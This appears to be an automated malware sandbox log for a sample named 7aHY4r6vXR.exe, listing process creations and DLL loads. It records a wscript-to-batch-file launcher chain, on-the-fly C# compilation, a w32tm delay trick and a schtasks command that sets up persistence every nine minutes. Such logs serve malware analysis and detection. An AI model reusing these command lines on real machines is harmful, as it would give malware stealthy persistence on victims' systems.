                                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\ChainBroker\IrbV6YakyWCvQIuALcoa2IhBwWZ19ItpwUlqov7vyFBfFx5s16nM.bat" "Jump to behavior
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\ChainBroker\bridgeServerFontSavesMonitor.exe "C:\ChainBroker/bridgeServerFontSavesMonitor.exe"Jump to behavior
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\axeflxig\axeflxig.cmdline"Jump to behavior
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "bridgeServerFontSavesMonitorb" /sc MINUTE /mo 9 /tr "'C:\ChainBroker\bridgeServerFontSavesMonitor.exe'" /fJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES69DB.tmp" "c:\Windows\System32\CSCAAFDA77B4B0340CF902F598B7E2DA6.TMP"Jump to behavior
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Default\AppData\Local\Temp\SfLAFHFXIbHzHGgilQgXtKOw.exe "C:\Users\Default User\Local Settings\Temp\SfLAFHFXIbHzHGgilQgXtKOw.exe"
                                    Source: C:\Users\user\Desktop\7aHY4r6vXR.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
                                    Source: C:\Users\user\Desktop\7aHY4r6vXR.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
                                    Source: C:\Users\user\Desktop\7aHY4r6vXR.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
                                    Source: C:\Users\user\Desktop\7aHY4r6vXR.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
                                    Source: C:\Users\user\Desktop\7aHY4r6vXR.exeSection loaded: <pi-ms-win-core-localization-l1-2-1.dllJump to behavior
                                    Source: C:\Users\user\Desktop\7aHY4r6vXR.exeSection loaded: version.dllJump to behavior
                                    Source: C:\Users\user\Desktop\7aHY4r6vXR.exeSection loaded: dxgidebug.dllJump to behavior
                                    Source: C:\Users\user\Desktop\7aHY4r6vXR.exeSection loaded: sfc_os.dllJump to behavior
                                    Source: C:\Users\user\Desktop\7aHY4r6vXR.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Users\user\Desktop\7aHY4r6vXR.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\Users\user\Desktop\7aHY4r6vXR.exeSection loaded: uxtheme.dllJump to behavior
                                    Source: C:\Users\user\Desktop\7aHY4r6vXR.exeSection loaded: dwmapi.dllJump to behavior
                                    Source: C:\Users\user\Desktop\7aHY4r6vXR.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\Users\user\Desktop\7aHY4r6vXR.exeSection loaded: riched20.dllJump to behavior
                                    Source: C:\Users\user\Desktop\7aHY4r6vXR.exeSection loaded: usp10.dllJump to behavior
                                    Source: C:\Users\user\Desktop\7aHY4r6vXR.exeSection loaded: msls31.dllJump to behavior
                                    Source: C:\Users\user\Desktop\7aHY4r6vXR.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Users\user\Desktop\7aHY4r6vXR.exeSection loaded: windowscodecs.dllJump to behavior
                                    Source: C:\Users\user\Desktop\7aHY4r6vXR.exeSection loaded: textshaping.dllJump to behavior
                                    Source: C:\Users\user\Desktop\7aHY4r6vXR.exeSection loaded: textinputframework.dllJump to behavior
                                    Source: C:\Users\user\Desktop\7aHY4r6vXR.exeSection loaded: coreuicomponents.dllJump to behavior
                                    Source: C:\Users\user\Desktop\7aHY4r6vXR.exeSection loaded: coremessaging.dllJump to behavior
                                    Source: C:\Users\user\Desktop\7aHY4r6vXR.exeSection loaded: ntmarta.dllJump to behavior
                                    Source: C:\Users\user\Desktop\7aHY4r6vXR.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\Users\user\Desktop\7aHY4r6vXR.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\Users\user\Desktop\7aHY4r6vXR.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\Users\user\Desktop\7aHY4r6vXR.exeSection loaded: windows.storage.dllJump to behavior
                                    Source: C:\Users\user\Desktop\7aHY4r6vXR.exeSection loaded: wldp.dllJump to behavior
                                    Source: C:\Users\user\Desktop\7aHY4r6vXR.exeSection loaded: propsys.dllJump to behavior
                                    Source: C:\Users\user\Desktop\7aHY4r6vXR.exeSection loaded: profapi.dllJump to behavior
                                    Source: C:\Users\user\Desktop\7aHY4r6vXR.exeSection loaded: edputil.dllJump to behavior
                                    Source: C:\Users\user\Desktop\7aHY4r6vXR.exeSection loaded: urlmon.dllJump to behavior
                                    Source: C:\Users\user\Desktop\7aHY4r6vXR.exeSection loaded: iertutil.dllJump to behavior
                                    Source: C:\Users\user\Desktop\7aHY4r6vXR.exeSection loaded: srvcli.dllJump to behavior
                                    Source: C:\Users\user\Desktop\7aHY4r6vXR.exeSection loaded: netutils.dllJump to behavior
                                    Source: C:\Users\user\Desktop\7aHY4r6vXR.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                    Source: C:\Users\user\Desktop\7aHY4r6vXR.exeSection loaded: policymanager.dllJump to behavior
                                    Source: C:\Users\user\Desktop\7aHY4r6vXR.exeSection loaded: msvcp110_win.dllJump to behavior
                                    Source: C:\Users\user\Desktop\7aHY4r6vXR.exeSection loaded: appresolver.dllJump to behavior
                                    Source: C:\Users\user\Desktop\7aHY4r6vXR.exeSection loaded: bcp47langs.dllJump to behavior
                                    Source: C:\Users\user\Desktop\7aHY4r6vXR.exeSection loaded: slc.dllJump to behavior
                                    Source: C:\Users\user\Desktop\7aHY4r6vXR.exeSection loaded: userenv.dllJump to behavior
                                    Source: C:\Users\user\Desktop\7aHY4r6vXR.exeSection loaded: sppc.dllJump to behavior
                                    Source: C:\Users\user\Desktop\7aHY4r6vXR.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                    Source: C:\Users\user\Desktop\7aHY4r6vXR.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                    Source: C:\Users\user\Desktop\7aHY4r6vXR.exeSection loaded: pcacli.dllJump to behavior
                                    Source: C:\Users\user\Desktop\7aHY4r6vXR.exeSection loaded: mpr.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: gpapi.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.storage.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: apphelp.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dlnashext.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wpdshext.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: edputil.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: urlmon.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iertutil.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: srvcli.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: netutils.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: appresolver.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: slc.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sppc.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeSection loaded: mscoree.dllJump to behavior
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeSection loaded: apphelp.dllJump to behavior
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeSection loaded: version.dllJump to behavior
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeSection loaded: uxtheme.dllJump to behavior
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeSection loaded: windows.storage.dllJump to behavior
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeSection loaded: wldp.dllJump to behavior
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeSection loaded: profapi.dllJump to behavior
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeSection loaded: cryptsp.dllJump to behavior
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeSection loaded: ktmw32.dllJump to behavior
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeSection loaded: ntmarta.dllJump to behavior
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeSection loaded: wbemcomn.dllJump to behavior
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeSection loaded: amsi.dllJump to behavior
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeSection loaded: userenv.dllJump to behavior
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeSection loaded: propsys.dllJump to behavior
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeSection loaded: dlnashext.dllJump to behavior
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeSection loaded: wpdshext.dllJump to behavior
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeSection loaded: edputil.dllJump to behavior
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeSection loaded: urlmon.dllJump to behavior
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeSection loaded: iertutil.dllJump to behavior
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeSection loaded: srvcli.dllJump to behavior
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeSection loaded: netutils.dllJump to behavior
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeSection loaded: appresolver.dllJump to behavior
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeSection loaded: bcp47langs.dllJump to behavior
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeSection loaded: slc.dllJump to behavior
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeSection loaded: sppc.dllJump to behavior
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeSection loaded: mscoree.dllJump to behavior
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeSection loaded: apphelp.dllJump to behavior
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeSection loaded: version.dllJump to behavior
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeSection loaded: uxtheme.dllJump to behavior
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeSection loaded: windows.storage.dllJump to behavior
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeSection loaded: wldp.dllJump to behavior
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeSection loaded: profapi.dllJump to behavior
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeSection loaded: cryptsp.dllJump to behavior
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                                    Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dll
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeSection loaded: mscoree.dll
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeSection loaded: version.dll
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeSection loaded: uxtheme.dll
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeSection loaded: windows.storage.dll
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeSection loaded: wldp.dll
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeSection loaded: profapi.dll
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeSection loaded: cryptsp.dll
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeSection loaded: rsaenh.dll
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeSection loaded: cryptbase.dll
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\System32\chcp.comSection loaded: ulib.dll
                                    Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: iphlpapi.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: logoncli.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: netutils.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: ntmarta.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: ntdsapi.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: mswsock.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: dnsapi.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: rasadhlp.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: fwpuclnt.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: kernel.appcore.dll
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeSection loaded: mscoree.dll
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeSection loaded: kernel.appcore.dll
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeSection loaded: version.dll
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeSection loaded: uxtheme.dll
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeSection loaded: windows.storage.dll
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeSection loaded: wldp.dll
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeSection loaded: profapi.dll
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeSection loaded: cryptsp.dll
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeSection loaded: rsaenh.dll
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeSection loaded: cryptbase.dll
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeSection loaded: sspicli.dll
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeSection loaded: mscoree.dll
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeSection loaded: kernel.appcore.dll
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeSection loaded: version.dll
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeSection loaded: uxtheme.dll
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeSection loaded: windows.storage.dll
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeSection loaded: wldp.dll
